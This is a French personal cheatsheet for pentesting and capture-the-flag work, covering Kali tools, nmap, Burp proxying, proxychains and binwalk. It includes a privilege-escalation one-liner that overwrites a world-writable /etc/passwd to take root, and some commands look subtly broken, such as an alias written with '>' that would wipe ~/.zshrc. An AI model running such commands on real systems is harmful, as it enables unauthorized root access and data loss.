Tips

Espèce de cheatsheet perso sur des sujets plutôt variés qui ne méritent pas leur fiche à eux.

Outils utiles

Afin d’avoir l’ensemble des outils qui sont plutot utile pour du pentest, il vaut mieux installer une kali. Une liste de ces outils suivra afin de monter une debian custom plus tard.

  • burpsuite - Un proxy web, indispensable

  • Avec lui vient l’addon FoxyProxy. Il permet de configurer firefox pour aller sur burp.

  • En parlant d’addon, on peut rajouter wappalyser. Il permet de voir les technologies Web utilisée.

  • gobuster - Un must-have pour fouiller

  • seclists - Un grand nombre de liste de sécurité qui permet de faire des requêtes automatisées.

  • BloodHound et BloodHoundPy - Des outils de collecte et d’analyse AD.

  • Kerbrute, impacket, crackmapexec et krb5-user - Un ensemble d’outils pour travailler sur des tickets windows

  • rlwrap - Wrapper qui permet d’avoir un meilleur reverse shell en général.

Raccourci VM Virtual box

Ça commençait à me souler de devoir à chaque fois ouvrir virtual box pour lancer ma Kali. Alors je me suis fait un raccourci. Ci-joint le petit script pour tout faire propre :

VMName="Kali"
VIRTUALBOXVM=`which virtualboxvm`
Icon="kali-menu"
IconSize="256x256"
IconUrl="https://gitlab.com/kalilinux/packages/kali-menu/-/raw/kali/master/menu-icons/${IconSize}/apps/${Icon}.png"
IconPath="$HOME/.local/share/icons/hicolor/${IconSize}/apps/"
mkdir -p $IconPath
wget -O ${IconPath}/${Icon}.png ${IconUrl} -o /dev/null
echo "[Desktop Entry]
Name=${VMName} VM
Comment=Launch the VM of ${VMName}
Exec=$VIRTUALBOXVM --startvm ${VMName}
Icon=$IconPath/${Icon}.png
Terminal=false
Type=Application
Categories=Emulator;System;Utility;
">$HOME/.local/share/applications/${VMName}.desktop
chmod 0400 $HOME/.local/share/applications/${VMName}.desktop

Reste plus qu’à le rajouter à ton dock et c’est gagné.

Lancer le vpn

Il existe plusieurs vpn. Il faudra donc varier le fichier en fonction de ce que l’on souhaite faire.

sudo ls #Rentrer le mot de passe pour garder en cache le mdp sudo
sudo openvpn ~/Téléchargement/lab_Luclis.ovpn & #l'emplacement du fichier openvpn.

Nmap

il est utile de sauvegarder le fichier du scan nmap (-oN). Comme on est sur des CTF, on sait que la machine est en vie (-Pn) et l’on peut y aller de façon aggressive (-A). Cela signifie que l’on va verifier les ports, l’OS et passer les scripts par defauts de nmap. On vise large mais pas trop, j’ai mis 1000 au feeling. (je savais pas que c’était la valeur par défaut !) A ajuster je pense.

repository="/home/kali/NOM DE LA MACHINE"
ip="IP DE LA MACHINE"
nmap  -Pn -A -T4 --top-port 1000 -oN $repository/txt $ip
cat $repository/txt

burpcurl

J’aime bien présenté le résultat de mon travail à l’aide de curl. Seulement, de nombreuses petites options me manquent par défaut, comme le fait qu’il stocke les cookies ou passe par burp. Pour ça, j’ai créé l’alias burpcurl.

┌──(kali㉿LuKaLi)-[~/Agile]
└─$ echo "alias burpcurl='curl -v --cookie-jar ./cookies --cookie ./cookies --proxy http://127.0.0.1:8080'" > ~/.zshrc
┌──(kali㉿LuKaLi)-[~/Agile]
└─$ source ~/.zshrc

ProxyChain

Pour mettre à jour proxychain rapidement, j’ai préparé mon petit oneliner :

## pour burp
┌──(kali㉿kali)-[~/machines/Bizness]
└─$ cat /etc/proxychains4.conf | head -n -2 | sudo tee /etc/proxychains4.conf && echo -e "http 127.0.0.1 8080\n"   | sudo tee -a /etc/proxychains4.conf

## Pour chisel
┌──(kali㉿kali)-[~/machines/Bizness]
└─$ cat /etc/proxychains4.conf | head -n -2 | sudo tee /etc/proxychains4.conf && echo -e "socks5 127.0.0.1 5000\n" | sudo tee -a /etc/proxychains4.conf

Root - change passwd

Dans le fichier /etc/passwd, il est possible d’y mettre des mots de passes. Et si ce dernier est écrivable par tout le monde, on peut changer les mots de passe de tout le monde. Petit oneliner :
N.B : Avant de se lancer dans la commande directe, il faut voir si le shell implémente directement le \n ou s’il faut rajouter le -e.

echo "root:root:0:0:root:/root/bin/bash\n$(cat /etc/passwd | tail -n $(($(cat /etc/passwd | wc -l)-1)))" | tee /etc/passwd

List utiles

  • Pour les wordlist, on retrouve differentes listes sous /usr/share/wordlists/. Une bien connue est la seclists.

  • Pour les reverseshell, on en trouve sous /usr/share/webshells/.

  • Pour les exploits, c’est sous /usr/share/exploits/.

  • Pour les ressources windows, on va voir /usr/share/windows-resources/. Ça comprends powerview.

    • Pour importer powerview, il faut importer le module recon soit Import-Module /usr/share/windows-resources/powersploit/Recon/Recon.psm1

Binwalk

J’ai appris pas mal d’options binwalk un jour, il va falloir que je les recompiles toutes. En attendant, la classique :

┌──(kali㉿LuKaLi)-[~/Agentsudoctf]
└─$ binwalk cutie.png -e